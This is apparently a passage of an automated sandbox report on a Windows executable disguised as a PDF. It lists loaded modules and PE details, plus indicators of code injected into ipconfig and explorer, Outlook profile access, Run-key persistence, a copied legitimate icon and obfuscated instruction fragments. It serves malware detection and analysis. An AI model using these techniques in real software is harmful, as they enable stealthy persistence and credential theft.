Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\raserver.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe

File written: C:\Users\user\AppData\Roaming\J8AR3449\J8Alogri.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\ipconfig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 101 2043 5770 pdf.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 101 2043 5770 pdf.exe

Static file information: File size 2148960 > 1048576

Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 101 2043 5770 pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 101 2043 5770 pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 101 2043 5770 pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ipconfig.pdb source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdb source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RAServer.pdb source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RAServer.pdbGCTL source: wmplayer.exe, 0000001F.00000002.2476009555.0000000005770000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474668893.0000000003167000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2477735165.0000000000240000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: firefox.pdb source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: csc.pdb source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: csc.pdbF source: ipconfig.exe, 00000009.00000002.4589326105.0000000003325000.00000004.00000020.00020000.00000000.sdmp

Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 101 2043 5770 pdf.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Compiles C# or VB.Net code

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

PE file contains sections with non-standard names

Source: 101 2043 5770 pdf.exe	Static PE information: section name: .managed
Source: 101 2043 5770 pdf.exe	Static PE information: section name: hydrated
Source: 101 2043 5770 pdf.exe.0.dr	Static PE information: section name: .managed
Source: 101 2043 5770 pdf.exe.0.dr	Static PE information: section name: hydrated

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7872177 push rbx; iretd	0_2_00007FF7D787217A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_00417948 push esi; retf	6_2_00417954
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D4E2 push eax; ret	6_2_0041D4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D4EB push eax; ret	6_2_0041D552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D495 push eax; ret	6_2_0041D4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041D54C push eax; ret	6_2_0041D552
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041665C pushad ; iretd	6_2_0041665D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0041C6E2 push edi; retf	6_2_0041C6EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0040C6B8 push FFFFFFA4h; ret	6_2_0040C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059609AD push ecx; mov dword ptr [esp], ecx	6_2_059609B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05890FB8 push eax; retf	6_2_05890FC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588E9B5 push esp; retn 0000h	6_2_0588EAE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588EB02 push esp; retn 0000h	6_2_0588EB03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0588EB1E push esp; retn 0000h	6_2_0588EB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_101759B5 push esp; retn 0000h	7_2_10175AE7
Source: C:\Windows\explorer.exe	Code function: 7_2_10175B1E push esp; retn 0000h	7_2_10175B1F
Source: C:\Windows\explorer.exe	Code function: 7_2_10175B02 push esp; retn 0000h	7_2_10175B03
Source: C:\Windows\explorer.exe	Code function: 7_2_10177FB8 push eax; retf	7_2_10177FC7
Source: C:\Windows\explorer.exe	Code function: 7_2_106EF9B5 push esp; retn 0000h	7_2_106EFAE7
Source: C:\Windows\explorer.exe	Code function: 7_2_106EFB02 push esp; retn 0000h	7_2_106EFB03
Source: C:\Windows\explorer.exe	Code function: 7_2_106EFB1E push esp; retn 0000h	7_2_106EFB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_106F1FB8 push eax; retf	7_2_106F1FC7
Source: C:\Windows\explorer.exe	Code function: 7_2_1124FB02 push esp; retn 0000h	7_2_1124FB03
Source: C:\Windows\explorer.exe	Code function: 7_2_1124FB1E push esp; retn 0000h	7_2_1124FB1F
Source: C:\Windows\explorer.exe	Code function: 7_2_1124F9B5 push esp; retn 0000h	7_2_1124FAE7
Source: C:\Windows\explorer.exe	Code function: 7_2_11251FB8 push eax; retf	7_2_11251FC7
Source: C:\Windows\explorer.exe	Code function: 7_2_112F19B5 push esp; retn 0000h	7_2_112F1AE7
Source: C:\Windows\explorer.exe	Code function: 7_2_112F1B02 push esp; retn 0000h	7_2_112F1B03
Source: C:\Windows\explorer.exe	Code function: 7_2_112F1B1E push esp; retn 0000h	7_2_112F1B1F
Source: C:\Windows\explorer.exe	Code function: 7_2_112F3FB8 push eax; retf	7_2_112F3FC7
Source: C:\Windows\explorer.exe	Code function: 7_2_114519B5 push esp; retn 0000h	7_2_11451AE7

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"

Drops PE files

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File created: C:\Users\user\101 2043 5770 pdf.exe

Jump to dropped file

Drops PE files to the user directory

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File created: C:\Users\user\101 2043 5770 pdf.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

File created: C:\Users\user\101 2043 5770 pdf.exe

Jump to dropped file

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 101 2043 5770 pdf			Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 101 2043 5770 pdf			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon306.png

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
